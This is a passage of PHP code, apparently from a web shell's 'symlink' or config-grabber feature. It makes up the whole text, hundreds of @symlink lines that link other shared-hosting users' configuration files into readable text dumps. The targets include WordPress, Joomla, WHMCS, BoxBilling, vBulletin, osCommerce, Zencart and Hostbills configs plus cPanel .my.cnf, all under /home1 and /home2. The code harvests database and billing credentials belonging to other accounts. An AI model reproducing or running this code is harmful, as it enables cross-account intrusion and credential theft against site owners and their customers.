                                                                    @symlink('/home1/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home1/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //Home2
                                                                    @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
